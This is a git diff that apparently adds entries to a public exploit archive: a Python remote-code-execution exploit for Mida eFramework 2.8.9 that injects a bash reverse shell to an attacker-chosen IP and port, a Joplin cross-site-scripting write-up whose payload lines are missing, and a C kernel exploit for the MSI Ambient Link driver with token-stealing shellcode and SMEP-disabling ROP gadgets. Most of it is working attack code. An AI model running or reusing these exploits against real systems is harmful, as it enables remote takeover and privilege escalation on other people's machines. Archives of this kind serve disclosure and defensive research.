diff --git a/exploits/hardware/webapps/48835.py b/exploits/hardware/webapps/48835.py new file mode 100755 index 000000000..f40e1a5c4 --- /dev/null +++ b/exploits/hardware/webapps/48835.py @@ -0,0 +1,78 @@ +# Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution +# Google Dork: Server: Mida eFramework +# Date: 2020-08-27 +# Exploit Author: elbae +# Vendor Homepage: https://www.midasolutions.com/ +# Software Link: http://ova-efw.midasolutions.com/ +# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html +# Version: <= 2.8.9 +# CVE : CVE-2020-15922 + + +#! /usr/bin/python3 +# -*- coding: utf-8 -*- + +import argparse +import base64 +import random +import requests +import subprocess +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +def print_disclaimer(): + print(""" + --------------------- + Disclaimer: + 1) For testing purpose only. + 2) Do not attack production environments. + 3) Intended for educational purposes only and cannot be used for law +violation or personal gain. + 4) The author is not responsible for any possible harm caused by this +material. + ---------------------""") + + +def print_info(): + print(""" +[*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922) +[*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html +[*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php - +Reverse Shell + ./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP +rev-PORT """) + +def run_cmd(url,ip,port): + rev_shell = "sudo bash -i >& /dev/tcp/{0}/{1} 0>&1".format(ip,port) + print("[+] Reverse shell: {0}".format(rev_shell)) + data = { + "submit":"True", + "ipaddress0":"; {0}".format(rev_shell), + "netmask0":"", + "gateway0":"", + "dns1":"", + "dns2":"" + } + # exec rev shell + print("[*] Starting reverse shell to {0} {1}...".format(ip,port)) + try: + r = requests.post(url,data=data,verify=False,timeout=1) + except requests.exceptions.ReadTimeout: + print("[?] ...check if it worked") + pass + +def main(): + print_info() + print_disclaimer() + parser = argparse.ArgumentParser() + parser.add_argument("target", type=str, + help="the complete target URL") + parser.add_argument("ip", type=str, + help="the ip address for reverse shell") + parser.add_argument("port", type=str, + help="the port for reverse shell") + args = parser.parse_args() + run_cmd(args.target, args.ip, args.port) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/48837.txt b/exploits/multiple/webapps/48837.txt new file mode 100644 index 000000000..ce047ed25 --- /dev/null +++ b/exploits/multiple/webapps/48837.txt @@ -0,0 +1,49 @@ +# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC) +# Date: 2020-09-21 +# Exploit Author: Ademar Nowasky Junior (@nowaskyjr) +# Vendor Homepage: https://joplinapp.org/ +# Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe +# Version: 1.0.190 to 1.0.245 +# Tested on: Windows / Linux +# CVE : CVE-2020-15930 +# References: +# https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff + +# 1. Technical Details +# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag. +# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE. +# If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application. + +# 2. PoC +# Paste the following payload into a note: + + + +# 2.1 RCE with user interaction +# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit. +# By default, notes are stored in the last notebook created. + + + + +# To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint. + + + \ No newline at end of file diff --git a/exploits/windows/local/48836.c b/exploits/windows/local/48836.c new file mode 100644 index 000000000..08a9950fe --- /dev/null +++ b/exploits/windows/local/48836.c @@ -0,0 +1,158 @@ +/* +Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation +Date: 2020-09-24 +Exploit Author: Matteo Malvica +Vendor Homepage: https://www.msi.com +Software Link: https://msi.gm/ABLTMNB +Driver: MSIO64.sys +SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD +Version: 1.0.0.8 +Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406] +MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation +CVE: CVE-2020-17382 +Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/ +Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities +*/ + +#include +#include +#include +#include + +#pragma warning( disable : 6387 ) + +VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) { + // SHELLCODE FOR 1709 + BYTE token_steal[] = + "\x65\x48\x8B\x14\x25\x88\x01\x00\x00" // mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR + "\x4C\x8B\x82\xB8\x00\x00\x00" // mov r8, [rdx + b8h] ; _EPROCESS (kd> u PsGetCurrentProcess) + "\x4D\x8B\x88\xe8\x02\x00\x00" // mov r9, [r8 + 2e8h] ; ActiveProcessLinks list head + "\x49\x8B\x09" // mov rcx, [r9] ; Follow link to first process in list + //find_system_proc: + "\x48\x8B\x51\xF8" // mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId + "\x48\x83\xFA\x04" // cmp rdx, 4 ; Process with ID 4 is System process + "\x74\x05" // jz found_system ; Found SYSTEM token + "\x48\x8B\x09" // mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer + "\xEB\xF1" // jmp find_system_proc ; Loop + //found_system: + "\x48\x8B\x41\x70" // mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token + "\x24\xF0" // and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure + //find cmd + "\x48\x8B\x51\xF8" // mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId + "\x48\x81\xFA\x99\x99\x00\x00" // cmp rdx, 0d54h ;UniqueProcessId == ZZZZ? (PLACEHOLDER) + "\x74\x05" // jz found_cmd ;YES - move on + "\x48\x8B\x09" // mov rcx, [rcx] ;NO - next entry in list + "\xEB\xEE" // jmp find_cmd ;loop + // found cmd + "\x48\x89\x41\x70" // mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token + "\x48\x31\xc9" // xor rcx rcx ; clear some registers to avoid issues while unwinding the call stack + "\x48\x31\xc0" // xor rax rax + "\x48\x31\xf6" // xor rsi,rsi + "\x48\x31\xff" // xor rdi, rdi + "\x4D\x31\xC0" // xor r8, r8 + "\x48\xc7\xc1\xf8\x06\x15\x00" // mov rcx, 0x1506f8 ; move original cr4 value into rcx + "\xc3"; // ret ; RET + + token_steal[54] = pid; + token_steal[55] = pid >> 8; + + LPVOID allocated_shellcode = VirtualAlloc(NULL, + sizeof(token_steal), + MEM_COMMIT | MEM_RESERVE, + PAGE_EXECUTE_READWRITE); + + memcpy(allocated_shellcode, token_steal, sizeof(token_steal)); + + INT64 pop_rcx_offset = kernel_base + 0x15fc70; // gadget 1 1709 - pop rcx ; ret + INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret + INT64 wbindv_offset = kernel_base + 0x1175c0;; // gadget 3 1709 - wbinvd; ret + INT64 rcx_value = 0x506f8; // value we want placed in cr4 in order to disable SMEP + INT64 rcx_old_value = 0x1506f8; // original cr4 value + INT64 ret = pop_rcx_offset + 1; // RET NOP + + puts("[+] SMEP disabled"); + + BYTE input_buff[136] = { 0 }; + memset(input_buff, '\x41', 64); + memset(input_buff, '\x42', 8); // dummy RBP + memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8); // pop rcx + memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value + memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx + memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret + memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode + memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx + memcpy(input_buff + 120, (PINT64)&ret, 8); // RETNOP to restore the stack + memcpy(input_buff + 128, (PINT64)&ret, 8); // RETNOP to restore the stack + + printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode); + + DWORD lpBytesReturned = 0x0; + BOOL triggerIOCTL = DeviceIoControl(hFile, + IoControlCode, + input_buff, + sizeof(input_buff), + NULL, + 0, + &lpBytesReturned, + NULL); + + if (!triggerIOCTL) { + printf("[!] DeviceIoControl failed: %d\n", GetLastError()); + } + else { + puts("[+] SMEP re-enabled"); + puts("[+] Enjoy your SYSTEM shell\n"); + } + + system("start cmd.exe"); +} + +LPVOID GetBaseAddr(const char* drvname) { + LPVOID drivers[1024]; + DWORD cbNeeded; + int nDrivers, i = 0; + + if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { + char szDrivers[1024]; + nDrivers = cbNeeded / sizeof(drivers[0]); + for (i = 0; i < nDrivers; i++) { + if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) { + if (strcmp(szDrivers, drvname) == 0) { + return drivers[i]; + } + } + } + } + return 0; +} + +HANDLE GetDriverHandle() { + HANDLE hMsio; + + hMsio = CreateFileA("\\\\.\\MsIo", + FILE_READ_ACCESS | FILE_WRITE_ACCESS, + FILE_SHARE_READ | FILE_SHARE_WRITE, + NULL, + OPEN_EXISTING, + FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, + NULL); + + if (hMsio == INVALID_HANDLE_VALUE) { + printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError()); + exit(1); + } + + return hMsio; +} + +int main() { + puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica"); + DWORD IoControlCode = 0x80102040; + HANDLE hDevice = GetDriverHandle(); + INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe"); + DWORD pid = GetCurrentProcessId(); + + eopMsio(hDevice, nt, pid, IoControlCode); + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 72a840fa8..f1b3b15d7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10383,6 +10383,7 @@ id,file,description,date,author,type,platform,port 48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows, 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows, 48821,exploits/windows/local/48821.txt,"ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path",2020-09-21,"Burhanettin Ozgenc",local,windows, +48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -40658,6 +40659,8 @@ id,file,description,date,author,type,platform,port 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php, 48833,exploits/multiple/webapps/48833.txt,"B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)",2020-09-25,LiquidWorm,webapps,multiple, 48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple, +48835,exploits/hardware/webapps/48835.py,"Mida eFramework 2.8.9 - Remote Code Execution",2020-09-28,elbae,webapps,hardware, +48837,exploits/multiple/webapps/48837.txt,"Joplin 1.0.245 - Arbitrary Code Execution (PoC)",2020-09-28,"Ademar Nowasky Junior",webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,